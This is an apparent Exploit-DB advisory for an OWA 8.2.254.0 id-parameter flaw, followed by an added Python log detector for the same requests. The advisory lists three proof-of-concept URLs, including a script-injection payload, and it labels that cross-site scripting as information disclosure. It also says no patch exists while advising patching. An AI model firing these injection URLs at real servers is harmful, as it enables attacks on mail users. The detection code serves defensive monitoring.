vendor: Microsoft Outlook Web Access
by: Praveen Darshanam
CVSS: 5.5 MEDIUM
Information Disclosure
CWE: 200
Product Name: Microsoft Outlook Web Access
Affected Version From: 8.2.254.0
Affected Version To: 8.2.254.0
Patch Exists: NO
Related CWE:
CPE: a:microsoft:outlook_web_access:8.2.254.0
Metasploit:
Other Scripts:
Platforms Tested: Windows Server 2003, Internet Explorer 7

Information disclosure vulnerability in Microsoft Outlook Web Access (OWA) version 8.2.254.0

The vulnerability exists in the id parameter of Microsoft Outlook Web Access (OWA) version 8.2.254.0. Attackers can exploit this vulnerability to disclose sensitive information.

Mitigation:

Apply the latest security updates and patches provided by Microsoft.

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

"Microsoft Outlook Web Access (OWA) version 8.2.254.0"

OS: Windows Server 2003

Internet Explorer 7

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

There is an information disclosure vulnerability in "Microsoft Outlook Web
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:

https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script>

https://example.com/owa/?ae=Folder&t=IPF.Note&id=

https://example.com/owa/?ae=Folder&t=IPF.Note&id=A



Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA
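
Added example, not part of the original advisory or of any Microsoft code: a log check that flags ae=Folder requests to /owa/ whose id parameter has one of the three shapes listed in the advisory (markup, empty value, single character). The IIS W3C field layout, the sample log lines, the function names and the assumption that a legitimate folder id is a long base64-style token are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C-style log lines (addresses from documentation ranges).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip
2010-01-05 10:00:01 GET /owa/ ae=Folder&t=IPF.Note&id=LgAAAABkZXhhbXBsZWZvbGRlcmlkMDAwMDAwMDAwMDE%3d 192.0.2.10
2010-01-05 10:00:07 GET /owa/ ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script%3e 192.0.2.44
2010-01-05 10:00:09 GET /owa/ ae=Folder&t=IPF.Note&id= 192.0.2.44
2010-01-05 10:00:12 GET /owa/ ae=Folder&t=IPF.Note&id=A 192.0.2.44
2010-01-05 10:00:15 GET /owa/ ae=Item&t=IPM.Note&id=A 192.0.2.10
"""

# Assumption: a legitimate folder id is a long base64-style token.
ID_SHAPE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
MIN_ID_LEN = 16  # assumed lower bound, tune against real traffic

def query_params(query):
    """Split a logged query string; unquote() keeps '+' intact, unlike parse_qs."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key.lower()] = unquote(value)
    return params

def classify_id(value):
    """Return a reason string when the id does not look like a folder id."""
    if not value:
        return "empty id"
    if not ID_SHAPE.fullmatch(value):
        return "unexpected characters in id"
    return "id too short" if len(value) < MIN_ID_LEN else None

def suspicious_requests(log_text):
    """Return (client ip, reason, decoded id) for flagged ae=Folder requests."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        params = query_params(row.get("cs-uri-query", ""))
        in_scope = (row.get("cs-uri-stem", "").lower().startswith("/owa")
                    and params.get("ae", "").lower() == "folder")
        reason = classify_id(params.get("id")) if in_scope else None
        if reason:
            hits.append((row.get("c-ip"), reason, params.get("id")))
    return hits
```

Calling suspicious_requests(SAMPLE_LOG) flags the three requests from 192.0.2.44 and leaves the well-formed folder request and the ae=Item request alone.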